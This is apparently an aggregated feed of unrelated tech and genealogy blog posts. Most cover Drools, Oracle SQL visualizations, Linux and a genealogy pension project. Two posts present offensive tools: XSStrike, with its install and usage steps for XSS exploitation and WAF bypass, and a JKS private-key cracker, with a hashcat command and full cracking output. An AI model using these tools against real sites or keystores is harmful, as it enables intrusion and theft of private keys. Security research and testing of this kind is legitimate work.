  1. 其實 CVE-2016-3957 並非不安全的設計,在跟 CVE team 溝通的過程中發現 web2py 開始使用 JSON 取代 Pickle [Ref],因此判定 web2py 認為目前的設計是不洽當的,給予此編號。後來官方因故將 Pickle 改了回來,不過在沒有洩漏加密字串的前提下已經是安全的了。 

  2. 在自行架設的 web2py 環境中只會執行一次,沒有去細追 web2py 官方網站為何執行兩次。 


          When refactoring does not help        
Part of an messaging application I'm working on contains a complex piece of code. This part deals with deciding on basis of content and recipients who is to receive an incoming message.
for (BusRoute route: busRoutes){
  if (route.isMatching(report)){
    for(MessageFilter filter: messageFilters){
      if (filter instanceof DelayOnBusRouteMessageFilter){
        DelayOnBusRouteMessageFilter delayFilter = (DelayOnBusRouteMessageFilter)filter;
        if (delayFilter.getBusRoute().equals(route)){
          if (route.isApproachingRoutePoint(report, delayFilter)){
            if (delayFilter.getDelayApproachingThreshold() < threshold || threshold == 0){
              threshold = delayFilter.getDelayApproachingThreshold();
              deltaThreshold = delayFilter.getDeltaThreshold();
              ....
            else....
             ...
          else ...
What's wrong with this code? Being overly complicated it is difficult to test and maintain and without doubt it will probably contain multiple errors, i.e. it is very difficult to verify that this piece of code indeed implements the specified  requirements of what this part of the application is supposed to do. Trying to refactor it to bring down the cyclomatic complexity (McCabe index - counts separate execution paths) didn't help much. I was looking for other ways to improve code quality when I remembered using a rule engine to implement business rules for a proof of concept some years back. Rule engines are good when you can write declarative rules and want to externalize business rules or have a requirement that the rules should be dynamically modifiable at runtime. Working with a rule engine requires a different way of thinking compared to OO or even functional programming. Some understanding of the rule engine basics is necessary before we go on.


Rule engine basics
Most rule engines are based on the Rete algorithm, which is a matching algorithm in modern forward-chaining inferencing rules engines. Without going into details, in contrast to naïve implementations which loop over each rule and check for matching conditions, the Rete algorithm builds a network of nodes, where each node corresponds to a pattern occurring in the condition part of a rule. A rule is defined with a condition (when) part and a consequence (then) part:
rule "my very simple first rule"
 when
  Person(age > 30 && < 40 || hair == "black")
 then
   retract(p)
In the condition part you access field constraints of the facts present in rule engine's working memory, f.i. to match all persons between 30 and 40 year of age or with black hair. Then in the consequence part you put actions to execute when this rule's condition evaluates to true and this rule is executed, f.i. the selected person is retracted from the rule engine's working memory. The normal sequence of interactions with a rule engine is as follows:
  1. insert all facts
  2. fire all rules
  3. retrieve the results
Facts are represented by object instances, for the example above we would have a Person object with a int property age and a String property hair. In the first step we insert each fact into the working memory of the engine, which implicitly constructs the network of matching conditions. Next we let the rule engine fire all rules against the inserted facts. The engine will put all rules for which the conditions evaluate to true in a certain order on an agenda list and then removes and executes the first rule on the agenda, i.e. run the consequence (then) part of the rule. If this execution changes the working memory (retract fact(s) or insert of new fact(s)) then all rules are again evaluated and a new agenda results from this. The engine then proceeds with the execution of the first rule on the agenda again. This process repeats itself until the agenda is empty. Now the fire-all-rules step has finished and we proceed with retrieving the results, which can be the list of remaining facts or an arbitrary result object created or filled by a rule consequence. From the above you may have noticed that the order in which rules are put on the agenda makes a big difference. Therefore rule engines offer additional directives to group and prioritize rules as they appear on the agenda. Also they offer a large variation in how you may construct the condition part and the consequence part, you can use rule engine's native language or may extend this language with a self written dsl. It is very important that the getters of Fact objects or other data consulted in the conditional part of rules may not have side effects, because of how the Rete algorithm works. Remember, only change fact data in the consequence part and don't forget to trigger the rule engine to reconsider the conditions of the rules if that happens.


Setting up the environment
I set out to work to rewrite the code as a set of rules to be executed by the rule engine. Since I'm working on a Java project, I selected  Drools Expert, open source software from Jboss/Redhat for this task. For a .Net project you could use Microsoft BRE. The remainder of this part will focus on setting up the Eclipse IDE to write (and debug) the rules and supporting code to use the Drools rule engine for a Java application. First we install the Jboss Tools plugin in Eclipse. This plugin gives us several rule editors, a Drools perspective and the execution/debug facilities for Drools. Now we can create a new Drools project or convert an existing project to a Drools project. If you choose for a new project, you can have a sample Hello World drools files generated, which provide great starting point for playing around with the rule engine. The following files are being generated:
  • Sample.drl
  • DroolsTest.java
rule "Hello World"
 when
  m : Message( status == Message.HELLO, myMessage : message )
 then
  System.out.println( myMessage ); 
  m.setMessage( "Goodbye cruel world" );
  m.setStatus( Message.GOODBYE );
  update( m );
end

rule "GoodBye"
 when
  Message( status == Message.GOODBYE, myMessage : message )
 then
  System.out.println( myMessage );
end
The first rule matches any Message with status equal to HELLO. In the consequence the message property is printed, the status of the message is changed to GOODBYE and also the message is changed. Two things to notice here. The 'm :', which binds a new local variable called 'm' to the matched Message instance. And also the myMessage variable is bound to the message property of the Message instance. The auto created variables can be references in subsequent 'when conditions' or in the consequence part of the rule like in this example. The second thing to notice is the update(m) statement, which notifies the rule engine that the Message instance was modified. This means that the engine will clear the agenda and reevaluate all rules, which sounds like a big thing, but can be accomplished very efficiently by the engine because of the Rete algorithm.
public class DroolsTest {

  public static final void main(String[] args) {
    try {
      // load up the knowledge base
      KnowledgeBase kbase = readKnowledgeBase();
      StatefulKnowledgeSession ksession = kbase.newStatefulKnowledgeSession();
      KnowledgeRuntimeLogger logger = KnowledgeRuntimeLoggerFactory.newFileLogger(ksession, "test");
      // go !
      Message message = new Message();
      message.setText("Hello World");
      message.setStatus(Message.HELLO);
      ksession.insert(message);
      ksession.fireAllRules();
      logger.close();
    } catch (Throwable t) {
      t.printStackTrace();
    }
  }

  private static KnowledgeBase readKnowledgeBase() throws Exception {
    KnowledgeBuilder kbuilder = KnowledgeBuilderFactory.newKnowledgeBuilder();
    kbuilder.add(ResourceFactory.newClassPathResource("Sample.drl"), ResourceType.DRL);
    KnowledgeBuilderErrors errors = kbuilder.getErrors();
    if (errors.size() > 0) {
      for (KnowledgeBuilderError error : errors) {
        System.err.println(error);
      }
      throw new IllegalArgumentException("Could not parse knowledge.");
    }
    KnowledgeBase kbase = KnowledgeBaseFactory.newKnowledgeBase();
    kbase.addKnowledgePackages(kbuilder.getKnowledgePackages());
    return kbase;
  }

  public static class Message {
    public static final int HELLO = 0;
    public static final int GOODBYE = 1;
    private String text;
    private int status;
    getters and setters ...
  }
}
The following picture shows the audit logging after execution of the program. The audit log is a tremendous help in understanding how rules are executed.
Audit logging (click to enlarge)
Posted by Picasa
The Message object is inserted, which results in the creation of an activation (rule is placed on the agenda). This line of logging is a result of the line ksession.insert(message) in main(). Next the program calls fireAllRules(). This will execute the first activation on the agenda, i.e. Rule Hello World. The activiation is executed (i.e. the consequence part of the rule is executed) which creates an activiation of the Goodbye rule. Then the Goodbye rule activation is executed which completes the rule engine, because there are no activiations on the agenda.

Conclusion
Now we have some understanding of how a rule engine works. I´ve managed to apply this technology to resolve our complexity problem in the messaging application. The resulting rule files are small and concise and easily maintainable because there is a clear relation to the functional requirements.
Dependency injection (Spring, CDI) gave us the ability to create applications with loosly coupled components. A rule engine can help us improving the internal logic of components on specific spots where complex if.. then constructions cause maintenance to be a helluvajob.
          Portland print dialog explained        

KDE Project:

No, the Portland Print Dialog isn't about design by committee. It's about letting the platform provide the print dialog (as opposed to the toolkit). If you run a GNOME desktop that will probably mean a Gtk Print dialog. If you run a KDE desktop that will probably a dialog based on KDEPrint. Incidentally, there already is a Portland file dialog, and no it isn't designed by committee either (give it a try!).

To make these kind of dialogs really viable as a platform service there are still some barriers that need to climbed. In particular it will need to be possible to extend such a dialog in a toolkit-neutral and out-of-process way. That's currently not possible. I hope that we will be able to present a proof of concept of such an extensible dialog somewhen later this year. Until that happens it is indeed highly premature to talk about any of this in an LSB context.

Most of the other functionality currently provided by Portland's xdg-utils will be ready well in time for LSB 3.2 though. So there are enough other interesting Portland bits to talk about on LSB day 2!


          XSStrike v1.2 - Fuzz, Crawl and Bruteforce Parameters for XSS        

XSStrike is a python script designed to detect and exploit XSS vulnerabilites.
A list of features XSStrike has to offer:
  • Fuzzes a parameter and builds a suitable payload
  • Bruteforces paramteres with payloads
  • Has an inbuilt crawler like functionality
  • Can reverse engineer the rules of a WAF/Filter
  • Detects and tries to bypass WAFs
  • Both GET and POST support
  • Most of the payloads are hand crafted
  • Negligible number of false positives
  • Opens the POC in a browser window

Installing XSStrike

Use the following command to download it
git clone https://github.com/UltimateHackers/XSStrike/
After downloading, navigate to XSStrike directory with the following command
cd XSStrike
Now install the required modules with the following command
pip install -r requirements.txt
Now you are good to go! Run XSStrike with the following command
python xsstrike

Using XSStrike


You can enter your target URL now but remember, you have to mark the most crucial parameter by inserting "d3v<" in it.
For example: target.com/search.php?q=d3v&category=1
After you enter your target URL, XSStrike will check if the target is protected by a WAF or not. If its not protected by WAF you will get three options

1. Fuzzer: It checks how the input gets reflected in the webpage and then tries to build a payload according to that.


2. Striker: It bruteforces all the parameters one by one and generates the proof of concept in a browser window.


3. Spider: It extracts all the links present in homepage of the target and checks parameters in them for XSS.


4. Hulk: Hulk uses a different approach, it doesn't care about reflection of input. It has a list of polyglots and solid payloads, it just enters them one by one in the target parameter and opens the resulted URL in a browser window.



XSStrike can also bypass WAFs


XSStrike supports POST method too


You can also supply cookies to XSStrike


Demo video


Credits
XSStrike uses code from BruteXSS and Intellifuzzer-XSS, XsSCan.


Download XSStrike

          JKS Private Key Cracker - Cracking passwords of private key entries in a JKS file         

The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due the unusual design of JKS the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools. By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs.
To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15 included in this repository (pocorgtfo15.pdf) or available on various mirros like this beautiful one: https://unpack.debug.su/pocorgtfo/
Before you ask: JCEKS or BKS or any other Key Store format is not supported (yet).

How you should crack JKS files
The answer is build your own cracking hardware for it ;) . But let's be a little more practical, so the answer is using your GPU:
    _____:  _____________         _____:  v3.6.0     ____________
_\ |__\______ _/_______ _\ |_____ _______\______ /__ ______
| _ | __ \ ____/____ _ | ___/____ __ |_______/
| | | \ _\____ / | | \ / \ | |
|_____| |______/ / /____| |_________/_________: |
|_____:-aTZ!/___________/ |_____: /_______:

* BLAKE2 * BLOCKCHAIN2 * DPAPI * CHACHA20 * JAVA KEYSTORE * ETHEREUM WALLET *
All you need to do is run the following command:
java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt
If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file.
Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this:
$ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1
hashcat (v3.6.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Init
* Not-Iterated
* Appended-Salt
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

$jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO

Session..........: hashcat
Status...........: Cracked
Hash.Type........: JKS Java Key Store Private Keys (SHA1)
Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test
Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs)
Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9]
Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 7946.6 MH/s (39.48ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4014116700160/7625597484987 (52.64%)
Rejected.........: 0/4014116700160 (0.00%)
Restore.Point....: 5505024000/10460353203 (52.63%)
Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO
HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1

Started: Tue May 30 17:41:56 2017
Stopped: Tue May 30 17:50:24 2017
So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session.

Other things in this repository
  • test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to setup the dependencies for this project.
  • benchmarking: tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article.
  • example_jks: generate example JKS files
  • fingerprint_creation: Every plaintext private key in PKCS#8 has it's own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints, it's a little bit hacky but I don't expect that it will be necessary to add any other fingerprints ever.
  • JksPrivkPrepare: The source code of how the JKS files are read and the hash calculated we need to give to hashcat.
  • jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article.
  • jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password was correctly guessed.
  • run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py in example_jks script before.

Related work and further links
A big shout to Casey Marshall who wrote the JKS.java class, which is used in a modified version in this project:
/* JKS.java -- implementation of the "JKS" key store.
Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org>

Permission to use, copy, modify, distribute, and sell this software and
its documentation for any purpose is hereby granted without fee,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation. No representations are made about the
suitability of this software for any purpose. It is provided "as is"
without express or implied warranty.

This program was derived by reverse-engineering Sun's own
implementation, using only the public API that is available in the 1.4.1
JDK. Hence nothing in this program is, or is derived from, anything
copyrighted by Sun Microsystems. While the "Binary Evaluation License
Agreement" that the JDK is licensed under contains blanket statements
that forbid reverse-engineering (among other things), it is my position
that US copyright law does not and cannot forbid reverse-engineering of
software to produce a compatible implementation. There are, in fact,
numerous clauses in copyright law that specifically allow
reverse-engineering, and therefore I believe it is outside of Sun's
power to enforce restrictions on reverse-engineering of their software,
and it is irresponsible for them to claim they can. */
Various more information which are mentioned in the article as well:
Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another!


Download JKS-private-key-cracker-hashcat

          Comment on Proof of Concept: Running Web Applications in Docker Containers on Virtual Machines on my PC by John        
Update: Since I have shifted into a new paradigm where I probably won't need to be using a virtual machine to run test servers any more, I decided to run Docker on an Ubuntu Desktop virtual machine which can then host the Docker Containers for each server that I want to test. After the installation, I had some problems getting the sound to work on the virtual machine but managed to find found a fix for that here: https://communities.vmware.com/thread/463323
          Cypher – Pythonic ransomware proof of concept        
none
          Case Study – Performance Testing for Large XBRL Instance Processing        
Using the Bank of Indonesia as a case study, the XII Best Practices Board has published a guidance document on the proof of concept methodology to measure the performance of an XBRL processing engine when handling large instances. Read the case study here: Large Instance Processing – Bank Indonesia   http://www.istockphoto.com/photo/annual-report-6372295?st=97f4c61    
          Screencasting (Proof of Concept)        
Inspired by the awesome ways in which Andy Rundquist has been using screencasts with his students (here, here and here), I decided to try to adopt this technique with my small class of six AP Physics students this year. I’ve always likened grading to a strange form of archeology, one in which the teacher works […]
          Day 17 – Testing in virtual time        
Over the last month, most of my work time has been spent building a proof of concept for a project that I’ll serve as architect for next year. When doing software design, I find spikes (time-boxed explorations of problems) and rapid prototyping really useful ways to gain knowledge of new problem spaces that I will … Continue reading Day 17 – Testing in virtual time
          5 in 5 Vizualization 2 - Generating a d3.js visualization from a SQL Developer HTML report...        

This second vizualization is more of a workflow proof of concept compared to some novel visualization but I can guarantee you haven't seen the SCOTT.EMP table like this before. I have wanted to combine my two favorite tools for a while. Here is how you can drive a d3.js visualization directly from a SQL Developer custom report.

d3.js is a powerful graphing tool library. d3.js's superpower is that it can bind data elements behind the scenes to graphical elements in a canvas. Familiarity with HTML, JavaScript, and CSS is helpful but not required. Before I started working with d3 my JavaScript knowledge consisted of how to set focus on a page and simple text field validations. Check out Scott Murray's fantastic book and website for a gentle introduction to getting things done with d3.

SQL Developer is a leading free database query and administration tool from Oracle.

Why would you want to combine them? Two great tastes that taste great together? Well here is my dilemma. I'm a DBA. I connect to databases hundreds of times in the course of a month to check on things. Traditionally serving up fancy graphs using HTML pages and JavaScript libraries is domain of the server side programmer. While I have plenty of experience playing that role, it doesn't fit with my current workflow. Instead of a server somewhere else being the 'hub' with all the server side smarts, I need to be able to pivot between different environments in a lightweight fashion - I can't install nor would I want to install a perl/python/php environment on every DB server where i wanted to produce some graphs.

So here is a way to leverage SQL Developer's features to grab data for us. We will create a shell of a HTML doc which can be used to create a custom graphic in d3.js. And we can share this with our friends pretty easily - no server side knowledge or admin privileges required.

Research

Looking at data for this POC I zeroed in on one of my favorite relationships - hierarchical relationships. These are all over the place in the data we work with day to do. There are some convenient ways to work with the data like Parent/Child or Drill Down reports. The problem is these often break down after your data is one or two levels deep. So this is great for say showing records on each side of an FK relationship, but when about when you want to see the SCOTT.TMP.MGR hierarchy from King all the way down to every employee you have to do some CONNECT BY LEVEL magic and you still have to deal with some tabular output oddness.

Data Organization

select (SELECT ENAME FROM EMP WHERE EMPNO=E.MGR) AS MGR_ENAME, 
       ENAME 
  FROM EMP E 
 WHERE MGR IS NOT NULL;

This returns 13 rows. Order is not important for this. The code that will accept this data will we will feed the data to make connections as they are introduced to the graphic.

Prototypes

I had already done a lot of work with d3 node graphs earlier this year so I started with some of my earlier prototypes and simplified them to the bare minimums.

Pop-Up Schemio V1

Pop-Up Schemio V5 - Click "Add Next Event" button to add objects to graph.

Construction

I usually prototype d3.js using tributary.io. It is a site where you can browse visualization and build your own. Tributary has a secret superpower of its own - it is a live coding environment. Great for people like me who casually know 20 languages and the one I know best is pseudocode. While changing code in that environment you can easily see the effects of you changes without the normal edit / refresh cycle associated with web development.

The Difficult part

Here is the difficult part. Determining where all the code lives. SQL Developer can output raw HTML so I can go wild with DBMS_OUTPUT statements. I wanted to avoid embedding all of my custom javascript inside of DBMS_OUTPUT statements as it would be cumbersome to write and maintain. I decided I needed the following 4 things:
  • A HTML page generated from SQL Developer which contained a JSON representation of the data I wanted to use with d3.js
  • A reference to the d3.js library
  • A reference to a Style Sheet so I could make things pretty
  • A reference to my custom .JS code that I will keep on a web server accessible to me. This can either be internet or intranet availability, just depends on what controls you want to take with your code. Technically you could keep them on your local PC as well but sharing would be harder. If the external files are available on the net you can export your report definition and share with friends. If on your local PC you would need to make them a bundle and make sure the file paths in the parent HTML document are available on their systems as well.

    Building this yourself

    1) Put the mynodecode.css and mynodecode.js on a web server accessible to you and your users.

    2) Create a User Defined Report of type "PL/SQL DBMS_OUTPUT". Use the reportcode.sql source. Modify the paths to the .css and .js files as needed.

    3) Right click on the UDR and select "HTML..."

    4) Set DB connection, select "Open When Complete" and click Apply.

    5) SQL Developer will render the report to a local HTML file and fire up a browser to view it.

Refinement

The biggest challenge here was organization of the code. I wanted SQL Developer to be responsible for pushing the data required for the visualization and wanted to avoid wrapping any heavy logic into the SQL Developer User Defined report itself. Review reportcode.sql for the trim amount of work I have SQL Developer contribute to this process.

v1 Result

Here is an example of the report running after everything is in place.


          August - Visualization 1 - SQL Execution Plan Volatility        

The first visualization I will be working on is something I have been wanting for a while. I need a way to quickly show SQL Statement performance over time for 1 statement, especially to identify Execution Plan volatility. When researching performance problems I often need to quickly digest historical performance of a trouble statement - a statement that usually has run fine for years but now has started acting up.

Luckily Oracle 10g/11g/12c has this type of information in the Active Workload Repository. If you are licensed, the DBA_HIST views are a treasure trove of useful performance information. Don't forget to up your default retention from 8 days to something larger. On my prod instances I usually set it to 400 days so I have a year worth of performance data plus some padding.

Unluckily I have usually just seen this presented in tabular format with no easy way to gain some context.

My dream is to have some type of color map + bar graph hybrid which will allow me to see the difference between the worst and best execution plans and how often they are used when executing the SQL statement. Let's start working through the available data to see if I can reach that goal.

Research

To find out the SQL statements running in your database with the most volatile plans
-- For all AWH History find SQL statements that have used more than 1 PLAN_HASH_VALUE
select sql_id, count(*) from (
select distinct sql_id, plan_hash_value from dba_hist_sqlstat)
group by sql_id
HAVING COUNT(*) > 1
ORDER BY 2 DESC;
Run this against one of your databases and you will find SQL statements that are recorded in AWR that use multiple plans.

Data Organization

DBA_HIST_SQLSTAT will be where we focus on getting our data. If you have Diagnostics and Tuning pack then you can access this view via OEM or query it directly. A line is recorded for each sql_id, plan_hash_value combination that ran during the snap period. Details on the execution including # of times executed, and elapsed time can be used to calculate an average elapsed time per execution. Since I am most interested in which plan_hash_values contribute to good and to bad performance I have come up with this query to drive the visualization:
SELECT end_interval_time,
       sql_id,
       plan_hash_value,
       ROUND(elapsed_time_total/1000000,2) AS ElapsedTotal,
       executions_total,
       ROUND((elapsed_time_total/1000000)/executions_total,2) AS ElapsedPerExec
  FROM dba_hist_sqlstat JOIN dba_hist_snapshot
    ON dba_hist_sqlstat.snap_id=dba_hist_snapshot.snap_id
       AND dba_hist_sqlstat.instance_number=dba_hist_snapshot.instance_number
 WHERE sql_id IN (TRIM(:sql_id))
   AND executions_total       > 0
 ORDER BY DBA_HIST_SNAPSHOT.end_interval_time,
       DBA_HIST_SNAPSHOT.INSTANCE_NUMBER

Prototypes

My doodles are available here.

Construction

The SQL Developer DBMS_OUTPUT/HTML report type should have enough capabilities for me to get a basic version of this report across. In my dreams I have a full D3.JS interactive zoomable pannable graph available, but at this point I want to get a solid proof of concept running. The SQL Developer DBMS_OUTPUT/HTML report type will render basic HTML directly in a SQL Developer output window. The advantages are convenience and workflow, the disadvantages are that this rendering engine inside of SQL Developer is not as robust as a real browser. But I can do basic Font, Table, and CSS Styling to get my point across.

Refinement

Too many to list here, but the main difference from the prototypes is making the format a HTML table of horizontal bars. For SQL Developer HTML output it is just easier for now.

I didn't find an easy way to dynamically assign SQL plans to colors so I came up with my own crude mapper that uses the plan hash value. I wanted to make sure I created something in an anonymous PL/SQL block that had zero footprint... And hey this is my v1 :) If I end up implementing something browser based in Javascript I have better and more reliable ways to do this color assignment.

v1 Result

Since perfection is the enemy of delivering, here is an example and code for v1 of my graph:

Code is available here: AWRVolatilityColorMap-v1.sql

Please give it a try as a SQL Developer "DBMS_Output" report or run in SQLPLUS and spool the output to a html file and open with a browser to view the results.

To Do List

  • Pay more attention to time scale - v1 just serially lists all snaps that the SQL_ID appears in and sorts by snap_end_time descending.
  • Implement in d3 somehow - more on that in a future article
  • Add scales to improve readability

          An Update -- Document Conservation Resumes for War of 1812 Pension Files        

An Update -- Document Conservation Resumes for War of 1812 Pension Files

From our friends, at the Federation of Genealogical Societies (FGS), we have received an update on the War of 1812 Pension Files (Preserve the Pensions project).

Please do read this message in its entirety. It conveys a lot of important and vital information about this project from fundraising to a NARA security incident (which temporarily stopped a lot of projects including this one), and much more.

Today, the Federation of Genealogical Societies (FGS) announced the resumption of conservation of the War of 1812 Pension Files.

The Federation of Genealogical Societies (FGS) is pleased to announce National Archives staff have recently resumed document conservation of the War of 1812 Pension files covering surnames M(Moore)-Q. Document conservation is the essential first step in digitizing these files. Our digitization partner, Ancestry.com, has scheduled image capture of these newly conserved documents to begin the second week of September 2017. As capture resumes, new images will be added to Fold3.com on a rolling basis. The Federation and the dedicated volunteers of the Preserve the Pensions project have worked tirelessly for well over a year to negotiate a resolution to the work stoppage. This portion of the project plan is expected to be completed by third quarter 2018.

Many in our community have expressed frustration with the lack of new information on the status of the Preserve the Pensions project, ongoing negotiations and the safety of donated funds. As incoming President, I had an obligation to hold any response to those concerns until I could evaluate the history, speak candidly with the Preserve the Pensions team and meet with our partners. From the outside, and with perfect hindsight, it is easy to see a few opportunities missed to share more with you, our supporters. I stand behind the Preserve the Pensions team even so. They have worked incredibly hard to bring this unprecedented fundraising and preservation effort this far.

As frustrating as it may be to hear, FGS is limited in how much it can share with the community at large regarding ongoing negotiations with partners. As an organization, we most certainly may not reveal the internal discussions between our partners. That simple fact of business leaves you, our funding supporters, at times without satisfactory answers to your questions. While I will do everything in my power as FGS President to keep you apprised going forward, I will likely never satisfy your questions completely. With that in mind, and with the current project plan in place, I am able to share with you a very brief outline of events.

A security incident at the National Archives and Records Administration (NARA) facility in St. Louis led to a work stoppage of digitization projects for security review. This incident was unrelated to the Preserve the Pensions project in Washington D.C., however, our project was impacted.  The Federal bureaucracy is a slow-moving beast, as many of us have experienced outside of genealogy.   The completed review led to new security and project protocols. These protocols imposed new cost, space, and completion date constraints on the project. Neither conservation nor digitization could resume without a renegotiated project plan. These negotiations were difficult and time-consuming as each partner fought for their organization’s priorities. Ultimately, each partner compromised where they could to bring this important preservation project back online. The negotiations, however, are not over. The project plan above is a test of both the new project protocols and the compromises each of us made. It is a proof of concept. As this new project plan is put into practice, NARA, Ancestry.com, and FGS will continue to work together to evaluate the process with an eye towards negotiating the project plan for the final phase of conservation and digitization of surnames R-Z.

I can assure you, the funds you have so generously contributed to this effort are secure. In accordance with Generally Accepted Accounting Principles (GAAP), funds donated for a specific purpose must be separate from general operating funds. Your donations were deposited into a restricted fund. Any monies FGS provided for matching campaigns were moved from our operating capital into this restricted fund. Digitization and other project expenses were spent from the restricted fund.

While the total value of the project was originally projected to be $3.456 million, FGS was responsible for raising only half that amount - $1.728 million - due to the very generous match by Ancestry.com. This valuation was based on a projected 7.2 million pages in the War of 1812 Pensions collection at a total cost of $0.48 per page image. The new project plan has added to the total cost of the Preserve the Pensions project.  However, the number of images for the first half of the collection was less than originally expected.  We anticipate this trend will continue in the second half of the collection. Therefore, FGS stands by its decision to close community fundraising for the project.

On behalf of the board of the Federation and the dedicated volunteers of the Preserve the Pensions team, I have heard and acknowledge your concerns. Your support of this project has been both overwhelming and inspirational. As a first of its kind effort to crowdfund preservation of a genealogically-valuable collection, there was no roadmap. The Preserve the Pensions team is dedicated to seeing this project through until the very last page of the very last pension is online. We will evaluate the successes and shortcomings of the project as implemented before proceeding to a new project. In the meantime, we will work to regain your trust by being as forthcoming as the realities of these sensitive negotiations will allow.

FGS remains grateful to the community for your contributions; this project would not have been successful without the energy of all of you behind us. I welcome your questions or concerns at president@fgs.org.

--Rorey Cathcart, FGS President








.





~~~~~~~~~~~~~~~~~~~~
copyright © National Genealogical Society, 3108 Columbia Pike, Suite 300, Arlington, Virginia 22204-4370. http://www.ngsgenealogy.org.
~~~~~~~~~~~~~~~~~~~~~
NGS does not imply endorsement of any outside advertiser or other vendors appearing in this blog. Any opinions expressed by guest authors are their own and do not necessarily reflect the view of NGS.
~~~~~~~~~~~~~~~~~~~~~ 
Republication of UpFront articles is permitted and encouraged for non-commercial purposes without express permission from NGS. Please drop us a note telling us where and when you are using the article. Express written permission is required if you wish to republish UpFront articles for commercial purposes. You may send a request for express written permission to UpFront@ngsgenealogy.org. All republished articles may not be edited or reworded and must contain the copyright statement found at the bottom of each UpFront article.
~~~~~~~~~~~~~~~~~~~~~
Think your friends, colleagues, or fellow genealogy researchers would find this blog post interesting? If so, please let them know that anyone can read past UpFront with NGS posts or subscribe!
~~~~~~~~~~~~~~~~~~~~~
Suggestions for topics for future UpFront with NGS posts are always welcome. Please send any suggested topics to UpfrontNGS@mosaicrpm.com
~~~~~~~~~~~~~~~~~~~~~
Unless indicated otherwise or clearly an NGS Public Relations piece, Upfront with NGS posts are written by Diane L Richard, editor, Upfront with NGS.
~~~~~~~~~~~~~~~~~~~~~
Want to learn more about interacting with the blog, please read Hyperlinks, Subscribing and Comments -- How to Interact with Upfront with NGS Blog posts!
~~~~~~~~~~~~~~~~~~~~~

Follow NGS via Facebook, YouTube, Google+, Twitter

          Market analyst predicts enterprise Linux surge        





This is a reported story from www.desktoplinux.com by researchers Bruce Guptill and Bill McNee.
According to their story,"Nearly half the world's large businesses will use Linux on desktops or in servers by the end of 2011, Saugatuck Technology predicts. "The data are especially impressive when looking at the expected growth in the number of companies moving beyond 'proof of concept' by the end of the decade," the analyst firm said."

This isn't news to anyone who has been watching the impending ship date of Vista come forward like a creeping giant. With the need to upgrade to new more powerful computers just to run the new OS and with still lingering memories of the entire history of XP and the early web assaults this is not completely unexpected news. Also for those of you who read yesterdays blog, this is also a hint, at the reason Microsoft did the deal with Novel, the logic being if you can't beat'em, then join'em. The long play here is Microsoft's positioning themselves just in case of a market shift they can't ,even with all their money, stop from happening.
          Biotechnology Ignition Grant Scheme (BIG)        
The Biotechnology Ignition Grant (BIG) scheme of the Biotechnology Industry Research Assistance Council (BIRAC), Government of India. The scheme enables technology innovators and entrepreneurs to pursue a promising technology idea, and establish and validate proof of concept (POC) for the idea. By funding establishment and validation of POC, BIRAC wishes to help innovators and entrepreneurs ...
          cyber-dojo traffic-lights        
My friend Byran who works at the awesome Bluefruit Software in Redruth has hooked up his cyber-dojo web server to an actual traffic-light! Fantastic. Check out the video below :-)



Byran writes
It started out as a joke between myself and Josh (one of the testers at Bluefruit). I had the traffic lights in my office as I was preparing a stand to promote the outreach events (Summer Huddle, Mission to Mars, etc...) Software Cornwall runs. The conversation went on to alternative uses for the traffic lights, I was planning to see if people would pay attention to the traffic lights if I put them in a corridor at the event; we then came up with the idea that we could use them to indicate TDD test status.
Although it started out as a joke I am going to use it at the Summer Huddle, the lights change every time anyone runs a test so it should give an idea of how the entire group are doing without highlighting an individual pair.
